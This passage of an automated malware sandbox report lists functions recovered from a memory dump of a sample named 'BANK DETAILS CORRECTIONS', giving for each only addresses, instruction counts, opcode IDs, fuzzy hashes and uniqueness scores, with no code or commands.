                                                                                    • Opcode Fuzzy Hash: 98b20eeefd2b0f1e0cdb0f6431c7535224055eb46a1d4c3a3139946024a3ee79
                                                                                    • Instruction Fuzzy Hash: AFF0E2755137579FE3A2DB1CC148B557BDC9B40BA2F099825DD0ED7512C260FA80CB71
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962619 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                    • Instruction ID: e5f8efd572e521e1a59067531a7005d9155433c2d6c98f990c9f4c561ef7bd92
                                                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                    • Instruction Fuzzy Hash: B9E0D8323006012BE7219F598CC4F47776EDFD6B10F05007AB5085F251C9E2DC0983B4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019B6030 Relevance: .0, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                    • Instruction ID: 38f14e0938e1454675770342fb124cdd2a16cce2551e3cd4b9b2f2d990e1aa3d
                                                                                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                    • Instruction Fuzzy Hash: FEF03072104204AFE3218F0BDA84FA2BBF8EB45365F46C429E60D9B561D379FC40CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01920710 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                    • Instruction ID: a1018734604166c4b41ee5aa59ed28a4f054ffed48d96afd8c1ebb19d2af2850
                                                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                    • Instruction Fuzzy Hash: D6F0ED7A2043559BEB16CF1AD440AA57BACFB81360F084494F84A8B301EB31EA82CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019549D0 Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                    • Instruction ID: 39dd8ad2226e9b00e975f72c016d9a5b6f52f923ad4627f486ed7e6a6f942413
                                                                                    • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                    • Instruction Fuzzy Hash: 89E0D832244145ABD3F19A598800F6677A9DBD47A1F160429EA0CAB150FB70DCC0C7E8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019C678E Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                    • Instruction ID: b592724eb891cdb8370449b0317ad7f22a7e867297c1f86fc45b658e83fb802d
                                                                                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                    • Instruction Fuzzy Hash: 9FE0DF32A00214BBEB2197998D05F9ABEBCDF94EA1F050058BA08E71A0E530EE00C690
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019225E0 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 54c532b31ba24198a79b885280071c55c7151856f16b33cbe6f2ec9d8f0b9252
                                                                                    • Instruction ID: b5cafba580a70e816597c8ea5fae30eb5aa3e3e61e364a6db7b9e0fb936a8f6a
                                                                                    • Opcode Fuzzy Hash: 54c532b31ba24198a79b885280071c55c7151856f16b33cbe6f2ec9d8f0b9252
                                                                                    • Instruction Fuzzy Hash: CDE092321009549BC321BB29DD01F8A779AEBE0760F014525F11957190CA34A910C794
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019DA456 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                    • Instruction ID: ec7c64075bfc1420b35c664cc40c302a4990e74925e8e204f30cff2e3fe709d5
                                                                                    • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                    • Instruction Fuzzy Hash: 53E0ED31010651DFE7366B2AD958B527AA9BF90B52F14C829A19E124B0C7759891DA40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019A4000 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                    • Instruction ID: 7b613b0263e6ca8749b8aacedc6479b908116641a76faff8f55fd12facbe8f3a
                                                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                    • Instruction Fuzzy Hash: EDE0C2343403158FE715CF19C040B627BBABFD5A11F68C068A9488F205EB72E842DB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195CA38 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c6b23b26df64c8fc5732a701e3e42544464f2ed3c35a7a73fe24b5c8d1f95e6
                                                                                    • Instruction ID: 6c08069d35abae7adb03b75b0309aeb7eb84ce362fcb54371884d21d156c5a62
                                                                                    • Opcode Fuzzy Hash: 6c6b23b26df64c8fc5732a701e3e42544464f2ed3c35a7a73fe24b5c8d1f95e6
                                                                                    • Instruction Fuzzy Hash: 4CD02B328811317ACFB6E1187C04FD33E5D9B84220F064870F90CA2020D564DC81C3D4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0191823B Relevance: .0, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                    • Instruction ID: 08dbd506de28210df8659b7d79ff357b3ef7ac118b8d3e83e4ce94d157440f5e
                                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                    • Instruction Fuzzy Hash: 86E08C32440A14EEDB332F25DC00F9176A9FFD5B91F204C29E08E160A88674A8C1EA54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01922050 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc03388ef158e4b110c41a8ec7bc7c68579da3fa7ad5ca4abc78e485205021e6
                                                                                    • Instruction ID: 160238e7343cd7f3f83d40fc3dd61a990ecf77ccfd5e3ff6ea20d1ac5e425738
                                                                                    • Opcode Fuzzy Hash: dc03388ef158e4b110c41a8ec7bc7c68579da3fa7ad5ca4abc78e485205021e6
                                                                                    • Instruction Fuzzy Hash: E6E0C2332004606BC321FB5DDD00F4A739EEFE4660F010221F15987294CA64AD01C794
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01958A90 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                    • Instruction ID: b161df38f911c5eae944a696f43a9fab4cdcba44b4d1168fcf9beeba47914174
                                                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                    • Instruction Fuzzy Hash: 8AE08633111A1487C728DE18D515B7277A8EF45721F09463EAA5757780C534E544C794
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01976AA4 Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                    • Instruction ID: 0b8a17162e87fcd1d08b68d0112f93e9c8f90d82868be4cec2e3452bea3f04c1
                                                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                    • Instruction Fuzzy Hash: 8BD05E36511A50AFD3329F1BEA00C13BBF9FFC4A11705062EA54983920C670AC06CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195E59C Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                    • Instruction ID: 900e05ff6b4f999b2ac198deb25065fd8e22bedf54dcbcd04558172859e8638c
                                                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                    • Instruction Fuzzy Hash: EDD0A932654620ABDB32AA1CFC00FC333E8BB8C721F060499B008C7050C364AC81CA84
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0199E908 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                    • Instruction ID: 0ea3e4455b25689865c6e1fbbf94b778d18ee4f1976f4ebbb26ea1c0356bc1f2
                                                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                    • Instruction Fuzzy Hash: 39E0EC359506849BDF16DF5DC640F5ABBB9BB94B40F150054E54C5B664C624A900CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0191A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                    • Instruction ID: 225261d14b7ee2243cc81b4a0f5a36e8b167022df2dfe6e5f0ff85876a5f6029
                                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                    • Instruction Fuzzy Hash: 7AD022322270B093DB2856556900F636909ABC1A90F0A002C380E93804C0088C82C2E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195A830 Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                    • Instruction ID: f552b8f997131eb63be269e8de54e92d7e0d51d3487edfaf1cfc3723d21196b7
                                                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                    • Instruction Fuzzy Hash: B1D012371E054DBBCB119F66DC01F957BA9E7A4BA0F444020B908875A0C63AE950D584
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195CA24 Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf0b1db098920263e0fed003e22889aecfdad62d92856822aafe77fffb65af55
                                                                                    • Instruction ID: a560ba3bb0a53c683fb083c5a3e794e1fb3fc5d671b2811158d59f6bffcbea69
                                                                                    • Opcode Fuzzy Hash: bf0b1db098920263e0fed003e22889aecfdad62d92856822aafe77fffb65af55
                                                                                    • Instruction Fuzzy Hash: CAD0A735555105CBDF1ACF0CC510D2E3B78FF60E42B40006CEB08A1020E328EC01C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019302A0 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                    • Instruction ID: 25049fe4c3cbefb182cde1a2e6a1f7b7f2f7824d296bca4015e25f4da7840249
                                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                    • Instruction Fuzzy Hash: D7D0C935612E80CFD61BCB0CC5A4F1533E8BB84B45F850890F405CBB22D66CD940CA00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195C700 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction ID: 768297987707b4eebd17346635236d0fd45a2f2aa7d0cfca76b45d55ae59d6ed
                                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction Fuzzy Hash: E7C012322A0648AFC712AA99CD01F027BA9EBE8B40F000021F6088B670C635E920EA84
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01940310 Relevance: .0, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction ID: 546b028e166bb73bafad4511475032c7da1db76b8ec9e4d67cf600446a65faff
                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction Fuzzy Hash: 30D01236100249EFCB01DF41C890D9A7B2AFBD8710F148019FD19076108A31ED62DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01920750 Relevance: .0, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction ID: 7f7a5a7db0f8311c9b38ea986d6568cafd1ac727875a6138414a3951da9853f6
                                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction Fuzzy Hash: 14C04C797415418FCF15DB1AD294F5577E8FB84751F1908D0E809CB721E624E901CA10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019F4DAD Relevance: .0, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction ID: 8a66834fba7267e8ebb1955fb28ceb2d3cd792b7bf255a25496fe2aeaf130b1a
                                                                                    • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction Fuzzy Hash: 47B01232212545CFC7026720CB00F1832A9BF417C0F0900F0750489830D6188910E501
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01964340 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f38137d10b4a93bcfa6165509f00e773eee74ba2cb0038deb3748c82913a3230
                                                                                    • Instruction ID: 070ff96570986c0185c841e02afe48045aa54be3cd3edff12e0e536fe9c105d3
                                                                                    • Opcode Fuzzy Hash: f38137d10b4a93bcfa6165509f00e773eee74ba2cb0038deb3748c82913a3230
                                                                                    • Instruction Fuzzy Hash: A09002316059001291447158488C5468049ABE0301B55C021E0464554CCA148A565361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01964650 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d698daaf56cd4e7bec814ea0343a9ea42671d7efdc129a0dabe2d1f4009670a
                                                                                    • Instruction ID: 76a0adf76f41d587195e318b4065bfca8d15936f2bdc16a0268e6a1a5e8720c5
                                                                                    • Opcode Fuzzy Hash: 2d698daaf56cd4e7bec814ea0343a9ea42671d7efdc129a0dabe2d1f4009670a
                                                                                    • Instruction Fuzzy Hash: 1B9002616016004241447158480C406A049ABE1301395C125A0594560CC61889559369
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962B80 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: acc637d34963430cebd14575f2e4f59768f7355a1dd9dde4678d824ec3b09bb1
                                                                                    • Instruction ID: e6fb3d4d86d4bccb9e192b3a631668a532b864570cf7786442d05cfeadce279c
                                                                                    • Opcode Fuzzy Hash: acc637d34963430cebd14575f2e4f59768f7355a1dd9dde4678d824ec3b09bb1
                                                                                    • Instruction Fuzzy Hash: 1490023120150802D1087158480C68640499BD0301F55C021A6064655ED66589917231
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962BA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5c5100859af43574aa3f123535c5f5ee749b311a0d148b2f0398788bc6c0be6
                                                                                    • Instruction ID: f4c6b847304d6b83dba36ab150a3ebbf2c7bd6b72b215898f61c7e706a6e006a
                                                                                    • Opcode Fuzzy Hash: f5c5100859af43574aa3f123535c5f5ee749b311a0d148b2f0398788bc6c0be6
                                                                                    • Instruction Fuzzy Hash: D190023160550802D1547158441C74640499BD0301F55C021A0064654DC7558B5577A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01962BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
